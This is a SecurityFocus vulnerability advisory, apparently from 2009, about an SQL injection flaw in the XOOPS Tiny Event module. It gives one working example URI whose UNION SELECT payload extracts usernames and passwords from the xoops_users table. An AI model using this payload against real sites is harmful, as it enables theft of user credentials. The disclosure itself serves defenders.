Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

XOOPS Tiny Event 'print' Option SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/modules/tinyevent/index.php?op=print&id=-0/**/union/**/select+0x3a,0x3a,0x3a,uname,pass+from/**/xoops_users/*where%20admin%201%200%2066







 

Privacy Statement
Copyright 2009, SecurityFocus